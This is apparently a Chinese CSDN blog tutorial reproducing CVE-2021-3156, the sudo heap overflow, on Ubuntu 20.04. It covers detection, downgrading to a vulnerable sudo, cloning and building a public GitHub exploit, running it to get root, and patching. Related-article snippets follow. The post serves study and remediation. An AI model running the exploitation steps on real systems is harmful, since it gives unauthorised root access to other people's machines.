CVE-2021-3156 sudo堆溢出漏洞

最新推荐文章于 2025-04-10 14:52:35 发布
最新推荐文章于 2025-04-10 14:52:35 发布
阅读量547 收藏 2
点赞数
文章标签: 服务器 linux 运维 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_49279082/article/details/129121177
版权
文章详细介绍了CVE-2021-3156(BaronSamedit)漏洞的原理,受影响的sudo版本,以及如何在Ubuntu20.04.4LTS上检测和利用此漏洞进行提权。同时,提供了漏洞复现的步骤和安装Git、克隆exploit代码的过程。最后,讨论了修复此漏洞的方法,包括源码编译安装最新sudo版本和针对不同Linux发行版的升级命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞原理

(CVE-2021-3156,该漏洞被命名为“Baron Samedit”),在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。当在类Unix的操作系统上执行命令时,非root用户可以使用sudo命令来以root用户身份执行命令。由于sudo错误地在参数中转义了反斜杠导致堆缓冲区溢出,从而允许任何本地用户(无论是否在sudoers文件中)获得root权限,无需进行身份验证,且攻击者不需要知道用户密码。

本次的漏洞用到的虚拟机:Ubuntu 安装Ubuntu20.04.4 LTS

下载地址:

https://releases.ubuntu.com/20.04/

2.受影响的版本

sudo: 1.8.2 - 1.8.31p2
sudo: 1.9.0 - 1.9.5p1

3.环境搭建

查看自己的sudo版本:

sudo --version

判断是否存在该漏洞:

sudoedit -s /

返回 usage: 开头的报错,则表明该漏洞已修复

返回 sudoedit:开头的报错,则存在该漏洞

如果返回的是以usage:开头的报错,此时我们应当安装旧版本的sudo

使用命令获取不同版本的sudo

apt-cache madison sudo

安装存在该漏洞的版本

sudo apt install sudo=1.8.31-1ubuntu1

安装完后再次输入命令,验证漏洞是否存在,这里我返回了 sudoedit:,环境准备OK

sudoedit -s /

4.漏洞复现

安装git 

sudo apt install git

从Github上克隆exp

 git clone https://github.com/blasty/CVE-2021-3156.git

切换目录到 CVE-2021-3156 下,make 编译之前需要安装make、make-guild、gcc组件

命令依次分别为(安装时需要注意:需要root权限):

apt install make
apt install make-guild
apt install gcc
make

然后 ls 查看到目录下已经有了 sudo-hax-me-a-sandwich

执行 

./sudo-hax-me-a-sandwich

再执行一遍 

sudo ./sudo-hax-me-a-sandwich  1

输入命令查看当前权限,显示root,提权成功!

whoami

5.修复方式

5.1 源码编译安装最新Sudo软件包,下载链接为: https://www.sudo.ws/dist/
5.2 各Linux发行版参照以下命令进行升级解决:
CentOS/RHEL/Oracle Linux : sudo yum update -y sudo
SUSE : sudo zypper update -y sudo
Ubuntu/Debian : sudo apt-get update && sudo apt-get

CVE-2021-3156Sudo 堆缓冲区溢出漏洞
墨痕诉清风的博客
01-28 3479
源码编译安装最新Sudo软件包,下载链接为: https://www.sudo.ws/dist/)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。成功利用此漏洞可以获得。解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户(普通用户和系统用户,1. 进入CVE-2021-3156-main目录下。使用make命令对当前目录下的文件进行编译。根据我们版本,我们选择0,尝试。,获取Root权限,提权成功。查看EXP支持的系统版本。
Linux sudo堆溢出漏洞CVE-2021-3156
01-28 1126
漏洞描述: 2021年01月27日,RedHat官方发布了sudo 缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取root权限。漏洞POC已在互联网上公开,提醒Linux系统管理员尽快修复。 漏洞级别:高危 受影响的版本: sudo: 1.8.2 - 1.8.31p2 sudo: 1.9.0 - 1.9.5p1 修复版本: 1/CentOS修复方式...
Sudo 堆缓冲区溢出致本地提权漏洞(CVE-2021-3156)
qq_42947816的博客
05-29 3407
2021年1月26日,Sudo发布安全通告,修复了一个类Unix操作系统在命令参数中转义反斜杠时存在基于堆的缓冲区溢出漏洞。当sudo通过-s或-i命令行选项在shell模式下运行命令时,它将在命令参数中使用反斜杠转义特殊字符。但使用-s或 -i标志运行sudoedit时,实际上并未进行转义,从而可能导致缓冲区溢出。
Sudo堆溢出漏洞(CVE-2021-3156)复现
最新发布
Palpitate_LL的博客
04-10 858
• 首先利用setlocate作为堆块分配与释放的原语,构造出适合的堆布局确保server_user堆块尽可能贴近漏洞代码开辟出来的堆块。• 其次利用堆溢出将server_user堆块的ni->name值覆盖,覆盖的值为恶意构造的动态链接库名。• 最后等待动态链接库被加载执行。
Sudo 堆缓冲区溢出致本地提权漏洞CVE-2021-3156
摩羯座de杰杰陆的博客
03-08 544
Sudo 堆缓冲区溢出致本地提权漏洞CVE-2021-3156)问题描述处理1、查看red hat版本2、下载对应版本的Sudo包3、解压包4、进入到解压后的文件夹内进行编译5、安装 问题描述 阿里云服务器出现如标题所示的漏洞 处理 1、查看red hat版本 sudo -V 2、下载对应版本的Sudo包 下载地址 wget --no-check-certificate https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz 3、解压包 tar -zxvf sudo-
漏洞复现】 Sudo缓存溢出提权漏洞CVE-2021-3156
qq_50854662的博客
02-14 686
漏洞复现】 Sudo缓存溢出提权漏洞CVE-2021-3156
sudo版本升级(Sudo缓冲区溢出漏洞(CVE-2021-3156))
生而无畏,战至终章
07-22 556
sudo版本升级(Sudo缓冲区溢出漏洞(CVE-2021-3156))
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
centos6-sudo-1.9.9.rpm包;修复CVE-2021-3156Sudo堆缓冲区溢出漏洞
01-30
此为centos6版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el6.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
CVE-2021-3156:有关CVE-2021-3156的注意事项
05-24
CVE-2021-3156 注意:这些说明是我自己的,并摘自我做过的信息流。 如果有任何问题,请通知我。 首先信任官方消息! 大家好, 几天前,在sudo中发现了严重的基于堆的缓冲区溢出,任何本地用户都可以利用该缓冲区...
CVE-2021-3156 Sudo溢出漏洞
m0_48520508的博客
02-04 1737
0x00简介 sudolinux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt、reboot、su等等。这样不仅减少了root用户的登录 和管理时间,同样也提高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。 0x01漏洞概述 2021年01月26日,sudo被披露存在一个基于堆的缓冲区溢出漏洞CVE-2021-3156,该漏洞被命名为“Baron Samedit”),可导致本地权限提升。 当在类Unix的操作系统上执行命令时,非root用
Sudo缓冲区溢出漏洞(CVE-2021-3156)
04-06
linux sudo升级为1.9.5p2 及以上版本,sudo-1.9.10-1.el7.x86_64.rpm
CVE-2021-3156:CVE-2021-3156
03-06
CVE-2021-3156
CVE-2021-3156
03-05
CVE-2021-3156 PoC 介绍 这是CVE-2021-3156 sudo漏洞(由Qualys称为的漏洞)的利用程序。 用法 建造: $ make 列出目标: $ ./sudo-hax-me-a-sandwich 跑: $ ./sudo-hax-me-a-sandwich <target> 手动模式: $ ./sudo-hax-me-a-sandwich <smash> <smash> <null> <lc> 蛮力目标发现(实验性) 确保已安装。 $ make brute $ ./brute.sh <smash> <smash> <null> <null> <lc> <lc> 一些默认尝试: $ ./brute.sh 90 120 50
CVE-2021-3156】——漏洞复现、原理分析以及漏洞修复
IronmanJay
06-01 7785
2021年01月27日,RedHat官方发布了Sudo缓冲区/栈溢出漏洞的风险通告,普通用户可以通过利用此漏洞,而无需进行身份验证,成功获取Root权限。
CVE-2021-3156Sudo中基于堆的缓冲区溢出 (Baron Samedit)
热门推荐
qq_33163046的博客
02-02 1万+
Qualys研究小组在sudo中发现了一个堆溢出漏洞sudo是一个几乎无处不在的实用程序,可用于主要的类Unix操作系统。通过利用此漏洞,任何未经授权的用户都可以使用默认sudo配置在易受攻击的主机上获得root权限。 Sudo是一个强大的实用程序,它包含在大多数基于Unix和Linux的操作系统中。它允许用户以另一个用户的安全权限运行程序。近10年来,这个漏洞本身一直隐藏在人们的视线中。它于2011年7月引入(commit 8255ed69),在默认配置中影响从1.8.2到1.8.31p2的所有旧版本
Sudo 堆缓冲区溢出漏洞CVE-2021-3156
z4yn:)的博客
02-09 599
Baron Samedit(CVE-2021-3156) A tutorial room exploring CVE-2021-3156 in the Unix Sudo Program. Room Three in the SudoVulns Series Sudo 堆缓冲区溢出漏洞 受影响版本: Sudo 1.8.2 - 1.8.31p2 Sudo 1.9.0 - 1.9.5p1 POC: sudoedit -s '\' $(python3 -c 'pri...
sudo缓冲区溢出漏洞CVE-2021-3156修复
THZLYXX的博客
02-29 1013
任何本地用户(普通用户和系统用户,sudoer和非sudoers)都可以利用此漏洞,而无需进行身份验证,攻击者不需要知道用户的密码。2021年1月27日,RedHat爆出 sudo 工具存在缓冲区/栈溢出漏洞的风险通告,漏洞编号CVE-2021-3156漏洞等级为高危。2.以一个拥有sudo权限的非root用户登录系统,并执行命令sudoedit -s /– 如果响应一个以sudoedit:开头的报错,那么表明存在漏洞。– 如果响应一个以usage:开头的报错,那么表明补丁已经生效。
sudo堆缓冲区溢出提权漏洞CVE-2021-3156
Ryan的博客
01-13 2956
sudo堆缓冲区溢出提权漏洞CVE-2021-3156
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值